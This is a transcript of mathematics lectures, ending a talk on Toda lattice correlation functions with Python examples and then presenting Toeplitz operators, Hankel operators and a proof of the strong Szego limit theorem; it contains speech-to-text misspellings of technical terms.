example, let's do it for n equal to four. So, the q of lambda then will be. Okay, like that, so this is will be my lambda one, lambda two, lambda three, lambda four so there is always four roots and at most two roots can be coincident. So, the same here so we have. So, this q of lambda always lead the line minus four. And here we have some other points which I called lambda one minus lambda two minus lambda three minus lambda four minus so this is this property in the house from study the spectral theory of Jacobi operator. And, and another thing you need to know is where in this picture the lambda see the the music so the music basically can see it's only here so here you have one, mu two and mu three. 
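Coming back to the inverse problem stated a moment ago, that the map from the spectral data (the points mu_k and the weights w_k) back to the tridiagonal entries is one to one: the reconstruction can be run as a Lanczos iteration on the diagonal matrix of the mu's with starting vector sqrt(w), which is just the three-term recurrence of the discrete orthogonal polynomials described above. The round-trip test below uses a random Jacobi matrix rather than the Toda matrix M, but the mechanism is the same.

```python
import numpy as np

# Recover the diagonal and off-diagonal entries of a symmetric tridiagonal
# (Jacobi) matrix from its eigenvalues mu_k and the weights
# w_k = (first components of the normalised eigenvectors)^2.

def jacobi_from_spectral_data(mu, w):
    m = len(mu)
    diag, off = np.zeros(m), np.zeros(m - 1)
    v = np.sqrt(w)                       # p_0 = 1 in the discrete L^2(w) space
    v_prev = np.zeros(m)
    beta_prev = 0.0
    for k in range(m):
        u = mu * v                       # multiplication operator = diag(mu)
        alpha = v @ u
        diag[k] = alpha
        u = u - alpha * v - beta_prev * v_prev
        if k < m - 1:
            beta = np.linalg.norm(u)
            off[k] = beta
            v_prev, v, beta_prev = v, u / beta, beta
    return diag, off

# round-trip test: tridiagonal -> spectral data -> tridiagonal
rng = np.random.default_rng(0)
m = 8
b = rng.normal(size=m)
a = np.abs(rng.normal(size=m - 1)) + 0.1
M = np.diag(b) + np.diag(a, 1) + np.diag(a, -1)
mu, U = np.linalg.eigh(M)
w = U[0, :]**2                           # weights: squared first row of the eigenvector matrix
db, da = jacobi_from_spectral_data(mu, w)
print(np.max(np.abs(db - b)), np.max(np.abs(da - a)))   # ~1e-12: exact recovery
```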
And then you can only move so in this in this space here so they can see it's only here. Okay, so with this property so once I tell you how the mu and the lambda place you can see that q for example of mu one and q of mu one plus four they are both negative so the product is positive. And you look at several points here. Okay. And then so my weight so also the weight that we had that I define before. Also the weights are an explicit expression, which is given by this formula here so this everything I mean this is come out from from this paper. And the weight wl that I introduced before as an explicit expression. And also in this case it's easy to see that when this is positive. Sorry when this is positive this is negative and vice versa. So, so that this quantity is always positive issue. You make this picture. So now we know that. Okay, so this is the sign of this delta is equal to the sign of the first term, because the problem. Okay. And yes, the condition that the sum of wl from l to one minus one is equal to one gives me now this quantity so the a one so is just an integral. So I have the first expression of a one as a function only on my spectral data the mu and the lambda. So this is the first, the first, the first. Entrance of a one and then we've been the other one, but before before going on let me make some comments on this equation so. So this is odd for the muse is a is a is an only so is a simple odd and let me do some small small change of variable. So if I do this change of variable, so I sum over the mu by this quantity. And then it's straightforward to check that if I consider the derivative of the xi r over the t is equal to this quantity here so is the is the sum from l from one to a minus one of this product and this is equal to zero to two. So basically in this change of variable I have linearized equation that can be solved in a straightforward way. No, suppose we are able to solve it and now we have basically all the, all the, all the a's in the B so I'm integrating everything. So I have so the explicit formula for a one and a n so any is a is a quadrature and then be one we find it before now the dependence of time is here, and then the BK and the K for K from one to a minus one can be obtained by from the orthogonal inomials pk and pk plus one in the usual form. Okay, this is the structure of the integration. Okay, so this is so is an integrable system or less we have integrated it. So this is a little bit, I do say maybe not the most explicit formula you can get. There are some other formula that I mean you can get using hyperalytic data function which can be obtained through the is material formula obtained for KdB, but it's quite so the expression is quite compact for what we want to do. Okay, so now I mean I have this explicit formula I want to see what they can do for regarding correlation function. So this is so this is so this is my so I take my Gibbs measure so now this is h is the Hamiltonian of the total lattice. And this is a normalizing constant there is I mean I mean there is a change of variable so we have the P and the Q and I told you that everything can be put in terms of mu in lambda. And this is what you get from this measure so you get this measure where the mu this delta are the wonder month and this is the Q. So this is my Gibbs measure. And so the two point correlation function are obtained. 
So now the two point correlation function for example respect to the position position are obtained by this expression where the average of E of p since I mean in respect to p still gaussian is zero so is given by this interesting and challenging formula. So we have the P here, the P n plus one minus alpha the first term, then the P n plus one the second term and then the measure. Ok, so what to do with this. I mean this is a little bit challenging to study behavior for tea large and large. And so can in the afternoon will will say something more about this. Ok, so I'm finished. We have plenty time for questions. I went too fast. You said that the behavior for integrable and non integrable case are very much different but I missed this point. No, no, this is what numeric is not. Yes, but on numeric it looked like similar. No, no, no, the numeric is quite different. I mean so as I told you there are two universality class here. It's not even clear that the integral case is only like that. So this is the scaling is two over three. So it decreases lower because I mean in the integral case since you have an integral system. In so you have if you have to ends and particle in your face space is dimension to n, but it's integral. So it means that the face space the part that the system explore is n dimensional because you have an constant of motion. So the space is smaller. So it looks like thing decay faster like. Well, in the integrable case the face space that my system explore is slightly bigger so the decreases to over three. And so regarding this this plot I mean is there is a little bit more than this so this is this shape is called fkpz universality class. I make a reaction that when you are talking about different statistical behavior of integral or non integral system it is we are talking now about this quantum chaos. It's related to some quantum chaos conjecture. But this is for I'm not quantum you are in some more classical than this. I don't know. For classical integral. If I could so this so you cannot come. I cannot comment on this. So you mean that the quantum the classical integrable system. The classical integral system. See the function of a different. For example. Yeah, the zero of the function of different statistical behavior, but I cannot relate much to this. So this is the different. Yes, they have different so the zero of game function didn't have a statistical for large and for larger energy of different statistical behavior. But this is a very innocent so looking at this you take so you take integrable system render initial data you want to study correlation function. So for the harmonic oscillator the temperature is just perfect. So do you think it's the same for total or in general for integrable system. Numeric show difference actually numeric show different behavior for if you take no linearity looks like the non linearity enters in the. So it's not just a sort of pre factor in the correlation function. No, in the non linear case no. No. Yeah, I have another question so related to this to picture for example. So is this are the two curves universal in the two classes. Sorry, are the two curves universal in the two class so if you plot the same picture for the harmonic oscillator. No, you don't get the same. I mean, I think in the integrable rea. This is more is is more complex. I don't think so. She can we show the harmonic oscillator is not even behaving like this. 
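The "interesting and challenging" average above is exactly what the numerics quoted in this discussion estimate: sample the Gibbs measure, run the deterministic Toda dynamics, and average over samples. The sketch below works in stretch and momentum variables with periodic indices and takes V(r) = e^(-r) + r, so that exp(-r_j) is Gamma distributed under the product Gibbs measure; both choices are assumptions made for easy exact sampling, so this illustrates the procedure rather than reproducing any particular paper's setup.

```python
import numpy as np

# Crude Monte Carlo estimate of  S_pp(alpha, t) = < p_{c+alpha}(t) p_c(0) >
# for the Toda chain with random (Gibbs) initial data.

def toda_step(r, p, dt):
    # leapfrog in (r, p):  dr_j/dt = p_{j+1} - p_j,
    #                      dp_j/dt = V'(r_j) - V'(r_{j-1}),  V(r) = e^{-r} + r
    def force(r):
        f = 1.0 - np.exp(-r)
        return f - np.roll(f, 1)
    p = p + 0.5*dt*force(r)
    r = r + dt*(np.roll(p, -1) - p)
    p = p + 0.5*dt*force(r)
    return r, p

def sample_gibbs(N, beta, rng):
    p = rng.normal(scale=1/np.sqrt(beta), size=N)
    r = -np.log(rng.gamma(shape=beta, scale=1/beta, size=N))   # exp(-r) ~ Gamma(beta, 1/beta)
    return r, p

def S_pp(N=256, beta=1.0, t=40.0, dt=0.02, n_samples=100, seed=0):
    rng = np.random.default_rng(seed)
    c = N // 2
    acc = np.zeros(N)
    for _ in range(n_samples):
        r, p = sample_gibbs(N, beta, rng)
        p0_c = p[c]
        for _ in range(int(t/dt)):
            r, p = toda_step(r, p, dt)
        acc += np.roll(p, -c) * p0_c      # entry alpha holds p_{c+alpha}(t) * p_c(0)
    return acc / n_samples

S = S_pp()
# two sound peaks are expected near alpha of about plus or minus (sound speed) * t
```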
And then in the non-integrable case, do you see the same? So the experiments are for FPU and discrete Klein-Gordon, and they are universal indeed. So there are these two, maybe some others? Also discrete nonlinear Schrödinger, sorry, discrete nonlinear Schrödinger. They are universal, so they are in the same universality class. Yeah. But what I want to say is that there is not a single mathematically rigorous calculation, not even for the harmonic oscillator. Yes, for the harmonic oscillator. Well, it looks like it's t to the one half actually, from the analysis. Yeah, yeah. Ken: the homework assignment? The homework assignment is: exercise one, prove the formula, and exercise two, the periodic boundary conditions. Okay, this is the homework assignment. Does it make sense to ask this type of question for systems with an infinite number of degrees of freedom? Yeah, no, you can ask, but the point is, yes. So for example, for this Schrödinger equation, it was easier to discretize, make the statement, and let time go to infinity, rather than starting directly with the infinite setting. I think both from the point of view of numerics and of computation it is much easier to discretize the space. Yes, Mendl and Spohn actually did this for NLS: they did the discrete nonlinear Schrödinger equation and the discrete integrable nonlinear Schrödinger equation, and they show different universality classes. The integrable discrete nonlinear Schrödinger equation is called the Ablowitz-Ladik lattice. Do you see the same? No, as I mentioned, no, they decrease much faster. The only rigorous mathematical result, I think, in this business in dimension bigger than three is a paper by Lukkarinen and Spohn in Inventiones. It is the only paper in the literature where they are able to compute the decay of correlations when you increase the dimension of the space. So the most difficult case is the one-dimensional case, where the correlation functions decrease slowly; in higher dimensions they decrease much faster and it's easier to prove things. More questions? Okay, let's thank the professor for a very pedagogical lecture. Okay.
We will investigate the form of spatio-temporal correlation functions for integrable models of systems of particles on the line. There are few analytical results for nonlinear systems, and so we start developing intuition from harmonic chains, where steepest descent analysis yields detailed asymptotic behaviour of the correlation functions in a variety of scaling limits. We will introduce integrable nonlinear lattices, explain the integrable solution procedure, as well as computational simulations to see dynamics of correlation functions in action.
10.5446/54154 (DOI)
So I'm going to talk about some questions this morning about Toeplitz matrices and determinants. That'll be the focus of this morning, and then in the other talks, some of the other topics. And I'm going to really start as if you have not seen this before. So let's just begin. So a finite Toeplitz matrix has that structure. It's an n by n matrix. It has constants running down all the diagonals. And usually the entries correspond to the Fourier coefficients of some periodic function defined on the circle. But actually you could consider these for any infinite sequence whatsoever. But our focus will be always from the Fourier coefficient approach. So you have a function, you take the Fourier coefficients, you generate these, and the question is, if you take the determinant, what happens as the size of the matrix gets large, so as n goes to infinity. Such matrices occur a lot in mathematical physics. Originally, one of the original motivations was the two-dimensional Ising model and computing correlations there. But they arise in random matrix theory and in other places, and I hope we'll see some of that as time goes on. OK. So the second question that we'll tackle, and this is maybe in some sense slightly more related to the Painlevé equation connection, is if you take an integral operator on a line segment, and think of the line segment right now as finite. So we just have k of x, a function on the line, continuous (it actually doesn't even have to be that; it could be just bounded for what we're going to do), and it just takes a function and multiplies it by k of x minus y and integrates. So that function k of x, y, which is little k of x minus y, is called the kernel of the operator. And now the question is what happens to the Fredholm determinant. So I'll give a definition of this later in the slides if you haven't seen it before. But what happens to the determinant of I minus lambda T? Now we want the size of the interval to increase. OK. So that's the second question that we'll think about. And it turns out that really you can answer both of these questions in almost exactly the same way. So the same technique that works for one works for the other. And so what I'm going to do this morning is show you how to answer in the beginning the Toeplitz case, because it's a little bit easier to think about, and then later we'll actually look at the integral operator case as well. And please ask questions if anything is not clear. OK. So if you're thinking of these finite matrices and you're letting n go to infinity, it's sort of natural to say, does the answer to that question have something to do with the infinite array? I mean, why not just get rid of n altogether? And the answer to that is, yeah, in some sense that is true. Not quite. But so we want to just look at the infinite array here. Let me see, is this my pointer? I'm not sure this is pointing to anything. Oh, OK. Anyway, we want to look at the infinite array and think of it as an operator on a Hilbert space. And there's lots of ways to do that. And what we're going to do right now is maybe absolutely the most natural thing to do. But actually, sometimes you want to do other things as well. So I'm going to say some very simple things in the next slide. But it's important to remember that you're picking that, because a finite matrix doesn't actually care in some sense about the Hilbert space. You know, you can use whatever you like.
So what we'll use is the most probably natural setting. And that is to take just the generalization of Euclidean space and to look at little l2. So we're just going to look at sequences that start at 0 and go to infinity that are square summable. And you can always identify those sequences with the Hardy space. So how you do that is you just take the f sub k's and you form a function f of e to the i theta, which is just the sum from k equals 0 to infinity of f sub k e to the i k theta. So that's a function defined on the circle. And f sub k is the Fourier coefficient, which is just defined by integrating e to the minus i k theta. So that's a natural setting, and you can actually think of that infinite matrix is just operating on the sequence by just multiplication, you know, just regular old multiplication the way you do matrix multiplication. OK, so you've probably seen h2 or little l2, but just in case you have an inner product, which is the standard one. A norm is given by just the square root of the sum, the square of the sequences. And every function in h2 has an analytic extension into the interior of the unit circle. So you just think of that same series, but you just think of the absolute value of z to be less than 1. And we'll go back and forth with that. So sometimes we'll think of the sequence, sometimes we'll think of the function that is analytic in the interior of the disk. OK. OK. OK. So now, what I want to do is realize that Toplitz operator, the thing that is infinite in two directions. I want to just describe that some other way. It's not just the infinite array. So we need a couple of definitions. One is just the projection of l2 onto h2. So what does that projection do? It just takes a sequence from minus infinity to infinity, so your entire Fourier series, and just cuts it off. And goes, all you do is just go from 0 to infinity. So you have an l2 function onto h2. And we're also going to think about a piece of n, which takes the series in h2 and projects to just the first n Fourier coefficients. So just chops everything off. So these projections we'll use all the time to set things up. OK. So this is the other description of a Toplitz operator. So instead of just thinking of that infinite array, we can say, take a function that's bounded and take a function that's bounded. And the Toplitz operator with that symbol, that function's always called the symbol, which operates on h2 back to h2, does the following. It takes a function f, that is, a function in h2, multiplies by phi. So when you multiply a function in h2 by a bounded function, you get a function back in l2, because the Fourier coefficients may not vanish for negative index anymore. So what you do is just chop those off. So you just apply the projection. So the Toplitz operator takes a function, it's just multiplication, followed by projection. OK. And to make sure that this is the right thing, if you look at the matrix representation with respect to the standard basis, so I don't think this is, I don't think I'm getting this thing here to work. So if you take t of phi and apply it to, say, e sub k, e sub j, which are just the standard basis for h2, and you just do the simplest computation and integrate, you can easily see. You end up integrating phi times e to the ik theta times e to the minus ij theta, because you're taking the conjugate, and that's phi of j minus k. And that says if j minus k is constant, that you have the same diagonal, so it's exactly the right matrix. 
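The "multiplication followed by projection" description coming up can be verified numerically against the matrix picture just checked: apply phi times z^k on a grid, keep the nonnegative Fourier modes, and compare with the column (phi of j minus k). The symbol below is an arbitrary smooth example chosen only for the check.

```python
import numpy as np

# Check that "multiply by phi, then project onto nonnegative Fourier modes"
# has the matrix [phi_{j-k}] in the basis e_k(z) = z^k of H^2.

M, N = 256, 8                                    # grid size, size of the block we inspect
theta = 2*np.pi*np.arange(M)/M
z = np.exp(1j*theta)
phi = 2.0 + np.cos(theta) + 0.5*np.sin(2*theta)  # a bounded symbol on the circle

def coeffs(f):
    """Fourier coefficients in numpy's FFT index order."""
    return np.fft.fft(f)/M

k_idx = np.fft.fftfreq(M, 1.0/M).astype(int)
phi_hat = dict(zip(k_idx, coeffs(phi)))

T_action = np.empty((N, N), dtype=complex)
for k in range(N):
    T_action[:, k] = coeffs(phi * z**k)[:N]      # indices j = 0..N-1 of P(phi * z^k)

T_matrix = np.array([[phi_hat[j - k] for k in range(N)] for j in range(N)])
print(np.max(np.abs(T_action - T_matrix)))       # ~1e-15: same operator
```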
We just want to make sure this is the right thing. OK. So that has the right matrix representation. OK. So once we have that, we need to define one more operator in what follows. And this is what we call a Honkel operator. And it has a diff slightly, actually a very different matrix representation. Doesn't look so different, but it is actually a very different operator. It's index form, it's phi sub j plus k plus 1. And as you can see, it has constants running down sort of the opposite diagonals. So you have a1, then a2, a2, a3, a3, a3. Honkel operators and matrices have been around for decades or maybe centuries. And it's going to be important in what we do. So there's two things I want to mention about this before we go on. The first thing is, if your Fourier coefficients vanish for index 1, 2, 3, and so on, this operator is zero. So you have to have some positive coefficients for this thing to not be zero. The other thing is, let's pay attention to how many of these coefficients we have, because it's going to be important. So we have 1 with index 1 and 2 with index 2 and 3 with index 3. And we'll see that that turns out to be a useful thing to observe right now. OK. So that's the Honkel operator. And why is it important? It's important because it's one of the fundamental sort of blocks in the algebra of topolitz operators. So here are just the very, very basic properties of topolitz operators. T of phi is bounded. This little computation at the bottom shows you that. It's pretty trivial to show that. So you just take the norm of T of phi of f, and that's just the two norm of phi of f. If the p doesn't matter, you can pull out the infinity norm of phi, and that's all you have. Actually, the actual norm of it is the infinity norm. We don't need that. We just need to know it's bounded. And of course, it's linear with respect to A of T of phi plus B of T of phi is A of phi plus B of phi, or psi. Sorry, psi. And if your function is identically one, then your topolitz operator is the identity operator. That's all obvious. And then properties D and E, I'm not going to prove. You can try to just write that out, and it falls out. But it says the following. Property D says if you're taking T of a product, it's equal to the product plus this leftover piece, and the leftover piece is the product of two honkles. And as we'll see, that's going to be useful. And you can also talk about the hunkle of a product, and it splits into two pieces. So H of phi psi is T of phi H of psi plus H of phi T of psi tilde. That tilde just takes E to the i theta and turns it into E to the minus i theta. So all that's doing is flipping your Fourier coefficients. So D and E are basically algebra computations, but just believe them right now. They're going to be useful. OK. All right. So now I'm going to tell you the answer, and then I'm going to prove the answer. So the best known result about topless determinants is the Strong-Zego limit theorem. And in order to get kind of the most useful setting, it's not if and only if, but it's the most useful setting, we're going to look at a bonnock algebra of functions. So this is a bonnock algebra of functions defined on the circle, functions defined on the circle, they're continuous functions. And they have the property that their Fourier coefficients are summable and that the sum of k, phi sub k, in absolute value squared is also summable. So both of those things have to be summable. Those are, if one works, the other doesn't necessarily either way. 
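Properties d and e, and the anti-diagonal counting just mentioned (one phi_1, two phi_2's, three phi_3's), can both be tested numerically once T(phi) and H(phi) are built from the Fourier coefficients of a symbol. The sketch below checks the product identity on finite sections, where it is exact on the inner block for trigonometric polynomial symbols since nothing can leak past the truncation, and checks that the squared Frobenius norm of H(phi) is the weighted coefficient sum appearing in the Banach algebra norm. The symbols are arbitrary low-degree examples chosen for the test.

```python
import numpy as np

# (1) T(phi*psi) = T(phi) T(psi) + H(phi) H(psi~),  with psi~(z) = psi(1/z),
#     exact on the inner block of the truncation for trig-polynomial symbols.
# (2) ||H(phi)||_HS^2 = sum_{k>=1} k |phi_k|^2  (anti-diagonal counting).

def fourier_coeffs(vals):
    M = len(vals)
    c = np.fft.fft(vals)/M
    k = np.fft.fftfreq(M, 1.0/M).astype(int)
    return dict(zip(k, c))

def toeplitz(phi, N):
    return np.array([[phi.get(j - k, 0.0) for k in range(N)] for j in range(N)])

def hankel(phi, N):
    return np.array([[phi.get(j + k + 1, 0.0) for k in range(N)] for j in range(N)])

M, N = 256, 40
theta = 2*np.pi*np.arange(M)/M
z = np.exp(1j*theta)
phi_vals = 2.0 + 0.5*(z + 1/z) + 0.2*(z**3 + 1/z**3)      # degree-3 trig polynomial
psi_vals = 1.0 + 0.3*(z**2 + 1/z**2)                       # degree-2 trig polynomial

phi, psi = fourier_coeffs(phi_vals), fourier_coeffs(psi_vals)
prod = fourier_coeffs(phi_vals*psi_vals)
psi_t = {-k: v for k, v in psi.items()}                    # the tilde flips the coefficients

lhs = toeplitz(prod, N)
rhs = toeplitz(phi, N) @ toeplitz(psi, N) + hankel(phi, N) @ hankel(psi_t, N)
print(np.max(np.abs((lhs - rhs)[:N-6, :N-6])))             # ~1e-15 on the inner block

Hphi = hankel(phi, N)
hs_norm_sq = np.sum(np.abs(Hphi)**2)                       # one phi_1, two phi_2's, three phi_3's, ...
target = sum(k*np.abs(phi.get(k, 0.0))**2 for k in range(1, 10))
print(hs_norm_sq, target)                                  # equal to machine precision
```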
So you need both those conditions. And this is, for what we will do, it's a really nice bonnock algebra. And a hint of that is, remember that Honkel operator with the a1, 2a2s, 3a3s, that second sum there has something to do with that Honkel operator in some sense being small. So that's coming in a couple of slides. But that's one of the main reasons. But this is a bonnock algebra, it's closed. The functions are automatically continuous because of the l1 summability of the phi sub k's. And so if you multiply two of these, they have the same property. If you take a function in this algebra and exponentiate it, it has the same property. If you have a function that doesn't vanish and has winding number zero and you take the logarithm, it also has to be in this algebra. And that's also important. So any algebraic thing you can do that doesn't vanish, the inverse has to be in this algebra because it's a closed bonnock algebra. OK. Excuse me, very naive question. So if I were to take, so the norm is two summons, if I were to take only one of them, it would not be bonnock algebra under point-wise multiplication. Is this right? If I took just the first time. I've got to think about that. I think I'm not quite sure. I think if you took just the first one, it's OK. Yeah. Yeah, no, this is right. But you, right, we need both of them and they're not the same set of functions. Yeah. I think with the first one, it's OK. Yeah. OK. So now, here's the answer. OK. So d sub n is just going to be the determinant of t sub n. And what the Zegotherm says is that the determinant is asymptotic to g of phi to the nth times e of phi as n goes to infinity. And here are the two constants. e of phi is e to the log of phi, e to the zeroth coefficient of log of phi. And if you look at, that makes sense because if you read the top line, it says the function phi does not vanish and has winding number zero. So we know that its logarithm exists and it has the same properties. You can take the zeroth coefficient. The second term is e of phi, and that is the determinant of t of phi, t of phi inverse. So phi inverse exists. You can take its topolitz operator. And so we are taking two topolitz operators, multiplying them and taking their determinant. Now that determinant is actually an infinite determinant. And so here's the way the infinite matrix gives you an answer for the finite one. But it's not t of phi itself. You have to adjust things. Okay. So it's not clear that that last line even makes sense. What does that mean, the infinite determinant? So let me tell you, I'm going to tell you what that means. And then as soon as you know what it means, the proof kind of falls through. Okay. So we have to define this constant. We have to talk about infinite determinants. And so we're going to talk about trace class operators. So trace class operators satisfy a condition that says if you take any orthonormal basis and you have to be able to take any, that if you take t, t star to the one half and take the diagonal of that, that sum has to be finite. And so that's the definition. But the fact is this definition is hard to check. It's not something that's easy to check. So they're a nice class of operators. But what we want is an easier way to check. So what we're going to do is talk about Hilbert Schmidt operators. And Hilbert Schmidt are the things that are kind of easy to deal with. 
So an operator's Hilbert Schmidt, if you take the absolute value of its coefficients in the matrix array, square them and sum them and take any choice of orthonormal basis. If one is finite, they're all finite. And the sum is independent. So this is called the Hilbert Schmidt norm. So this is a very nice, easy to check. Because if you have the matrix array, you can more or less look at it. And the product of two Hilbert Schmidt operators is trace class. That's what is nice. It's like having two L2 sequences. You multiply them together, you get something that is L1. It's the analog of that. OK. So we'll worry about these two classes of operators. And here are some properties of trace class operators. These are well known. And they make everything easier. So they form an ideal in the set of all bounded operators. And they're closed in their own norm. Hilbert Schmidt operators also form an ideal. And they're also closed with respect to the topology defined by their norm. As I said, the product of two Hilbert Schmitz is trace class. If T is trace class, then T is compact. These are all limits of finite rank operators in these separable Hilbert spaces in their particular norms. So they have discrete spectra. And if they have, say, discrete spectra lambda sub i because they're compact. And the eigenvalues are L1 summable. So that's what follows from the definition of being trace class. So that fact, fact e there, allows us to write down an infinite product that we're going to define as the determinant. So if your lambda i's are eigenvalues of your operator, and you add one or the identity to it, then those eigenvalues should be one plus lambda i. So that infinite product then makes sense because your lambda i's are in L1. So that's the definition of an infinite determinant. It's one way to do it. And then another thing that is really useful is if you take an i plus T, where T is trace class, and you project, you apply the p sub n, where that's any set of actually orthogonal projections. It could be finite rank. They could be not. And if they are finite rank, we always think of the determinant defined on the image of that. So that will converge to the determinant of i plus T for any set of orthogonal projections. Property h is another useful property. If a n goes to a, strongly, that just means point wise. That means a n of f goes to a of f for any f in your Hilbert space. And b n star goes to b star strongly. And if T is trace class, a n, t, b n converges to a, t, b in the trace norm. That's what we need. And the functions defined by the trace, which makes sense, and the determinant are continuous on the set of trace class operators and with respect to the trace norm. So all of these are basic facts about these operators. If T1, T2, they don't have to individually be trace class, but if the product is trace class and T2, T1 are trace class, then the trace of T1, T2 is the trace of T2, T1. And the determinant of i plus T1, T2 is the determinant of i plus T2, T1. Okay, so if you think about ordinary determinants, everything that works there basically works here. You just have to be in the right setting to get things to work. Okay? All right. All right, so we want to apply this. First of all, we want to say the constant in this theorem makes sense, the constant in the Zegel limit theorem. So remember, everything is supposed to be an harmonic algebra, right? So phi is an harmonic algebra. It doesn't vanish, so phi in versus. So T phi psi is T phi T psi plus H phi H psi tilde. 
That's one of our conditions. So if you let psi be phi inverse, then you apply this. You just get T phi T psi inverse is i minus H of phi, sorry, T phi T phi inverse is i minus H of phi, H of phi inverse tilde, right? And each symbol is in the bonnock algebra, and what is the Hilbert-Schmidt norm of one of those operators? Well, those are the Honkels. So remember what they do. You have 1A1, 2A2s, 3A3s, you square them, you add it all up, and you get exactly that sum. So if you're in that bonnock algebra, then both of those Honkel operators are Hilbert-Schmidt. The product then is trace class, so that determinant makes sense. So that's the first thing. We have to have the answer make sense. OK? Is that OK? Yeah? OK. All right. OK. So now the answer makes sense, so now let's actually prove the theorem. All right. So I want to make another remark about these identities. So these two algebra identities, which are building blocks of everything we do, also tell you two other things. If you have a function, psi minus or psi plus, so these, if they have the property, say for psi minus, that for k bigger than 0, they don't have any 4A coefficients. They all vanish, or for psi plus for k less than 0, the 4A coefficients vanish. Then you can pull out those topolitz operators. And why is that? Well, think of that top thing with psi plus on the right. So if you look at T of phi T psi plus H of phi H psi tilde, if you have a plus function, the tilde changes it to a minus function because the 4A coefficients flip. So that doesn't have any then positive 4A coefficients, so therefore H of psi tilde is 0 and the same thing on the other side. So you can factor out a minus function on the left and a plus function on the right for topolitz operators. And you can do a similar thing for the Honkel, except they both involve minus functions, essentially. You can factor out a minus function on the left and phi plus tilde, you can factor it out as psi plus on the right. I hope I had the rights and left straight because I mix those up all the time. But anyway, yeah, minus on the left plus on the right for topolitz. Okay, that just follows from that identity. All right. Okay, so now let's continue with what I hope is the proof of this. So if phi sub k is 0 for k less than 0 or k bigger than 0, then the topolitz matrices are triangular. So now I'm talking about the finite topolitz matrices, right, because the positive 4A coefficients were below the diagonal and the negative coefficients were above the diagonal. So you just have something that's either here or here. So the determinant is trivial in that case. Determinant of Tn of phi is just the zeroth coefficient to the nth power because it's triangular. Okay, the other, sorry, obvious but observation we want to make is that the finite matrix is just the upper left corner of the infinite array. So if you take the whole array and you just chop it off like that, you get the finite matrix. Okay. Now here's a crucial, crucial algebra step that makes this all work. If I have chalk, is there chalk? Yeah. Let me write this out because it's kind of, it's important. So if you as an operator whose matrix representation is upper triangular, so if you have something like this. So ours topolitz ones look like this, right? So if it has an upper triangular representation and this is all zero, right? And we apply a piece of n, what that's going to do, so all of this is zero, is it's going to make this all zero. 
So if you cut it off like that, it's the same thing as having a piece of n on both sides. Okay, so because if this all becomes zero, this is already zero and it's the same thing. Okay, so that's crucial. And if you have a lower triangular form, something over here, and you cut it off this way, it's the same as cutting it off both ways. So that fact is what allows you to have an absolutely simple proof of the Zegawitim theorem. Okay, so you can, so you only need one of the piece of n's in this case. Okay, alright, so if you had an operator and you could factor it into lower triangular times upper triangular, cut it off, you could move the piece of n inside and finding your determinant would be absolutely trivial. Okay, so that's what, that would be wonderful, but that doesn't happen. What happens for Toblitz operators is the opposite. It doesn't factor into L times U, it factors into something that's U times L. So it does just the opposite of what you want. So what are we going to do? We're more or less just going to fix that via a commutator. Okay, so now we have to talk about something called the Wiener-Hot factorization of the function. Okay, so our function lives in this bonnock algebra. It doesn't vanish, it has winding zero. It has a logarithm. If you take the logarithm of it, okay, imagine taking the logarithm, you can split it into a piece that has positive coefficients plus a piece that has negative coefficients. You can exponentiate that back and what you're going to have then is a product of something with positive coefficients and possibly zero times something with negative coefficients. It doesn't matter where you put the zero term in either factor. Okay, so we have this Wiener-Hot factorization which allows us to write our function phi as a function with negative possibly zero coefficients times a function that has positive for a coefficients plus possibly zero. Okay, so phi plus extends to be analytic inside the unit circle and phi minus, because you're just replacing z by one over z, extends to be analytic outside the unit circle. And this is true also of these inverses. As long as we're in this bonnock algebra, whatever holds for anything that is legal will hold for everything. Okay. All right, so we have that factorization and then we look at our properties again. Remember what we said, if you have a plus function, you can factor it out onto the right. So t of phi is t of phi minus times t of phi plus if you have this factorization. Okay, but what does t of phi minus look like? It has coefficients above the diagonal, t of phi plus has coefficients below the diagonal. So t of phi minus is upper triangular, t of phi plus is lower triangular. So that's the splitting we have. It's not quite the right one. It's the wrong order. So but we're still going to make use of this and this is what's really crucial. Okay, so here's how this goes. You take your topolitz operator t of phi. You truncate it to get your upper left-hand corner and then you split that function apart and now we have upper triangular times lower triangular. And what we're going to do is insert more or less the order we want on the outside. So we're going to put a t of phi plus times t of phi plus inverse, those cancel because they're plus functions. And t of phi minus times t of phi minus inverse, those cancel because you can always bring minus functions in from the left. So we haven't changed it. 
But now what we can do with that piece of n is bring it inside because of that property that the t of phi plus is lower triangular so the pn will come inside and on the right-hand side the pn can come inside one step. So this is just basic linear algebra. Okay, now if you take determinants, think of taking determinants of that whole thing with respect to the finite matrices. The determinant of the t of phi minus is just phi minus the zeroth coefficient to the nth power. For the t of phi plus it's just phi plus the zeroth coefficient to the nth power. That's all it is. So we've got that. Okay, what's left is the middle. So the middle has the pn and has four operators. But now we're going to use our algebra again. If you take the two on the two most left ones, t of phi plus inverse times t of phi minus, use your algebra property and collapse those. Then it'll be t of phi minus over phi plus plus two honkels. But what are those two honkels? You're in your algebra so those honkels are trace class. The same thing for the two operators on the right. That's going to be phi plus over phi minus, collapse those. We can always collapse. We have then that topolets plus honkel. But now collapse again. I mean if you multiply those four functions together what do you get? You get one. With repeated collapsing you always have something plus trace class, something plus trace class and eventually i plus trace class. Remember it's an ideal so you can always can multiply and you're still in trace class operators. So this is of the form i plus a where a is trace class. And then you just use the fact that the finite determinants converge to the infinite determinant. And that converges then to this determinant of the product. But we can take the t of phi plus inverse and move it all the way over because it's just a standard property of determinants. And so it's a little bit easier to write it the way you have it there on the right, determinant of t phi t phi inverse. Collapse them again. So that's it. You know you just set this up correctly and then there's sort of a three line proof and everything works. Okay. So the assumptions are phi has to be in the bonnack algebra, winding number zero, can't vanish winding number zero and you've got your theorem. I'm sorry. Second term. Second term. Yeah. I'm going to say something about that. Yeah. Yeah. In a second. Yeah. So where have we used that the sum of absolute value we have used that the Sobolev norm converges? Where have we used that the sum of absolute values actually? Well, we have what we're starting with, we want a continuous symbol. And we're starting, if we just have that Sobolev norm, we don't have the bonnack algebra. We're using that over and over again. Right. Yeah. Just in the bonnack algebra part. Yeah. Was there another question? Yeah. So we'll talk about, we'll actually talk about an identity instead of this in a second. But let's stop here and go on. Okay. I just want to rewrite this because this is not the original way that Zago wrote the answer. So how do you get the original answer? So again, if you take this operator and you write it as T phi minus T phi plus T inverse phi minus T inverse phi plus, you can do that because for the plus and minus functions, inverse and commute with the topolitz part, then this is a, you can rewrite this as e to the a, e to the b, e to the minus a, e to the minus b, where a is T of log of phi minus and b is T of log of phi plus. Okay. So that's again, just simple algebra. 
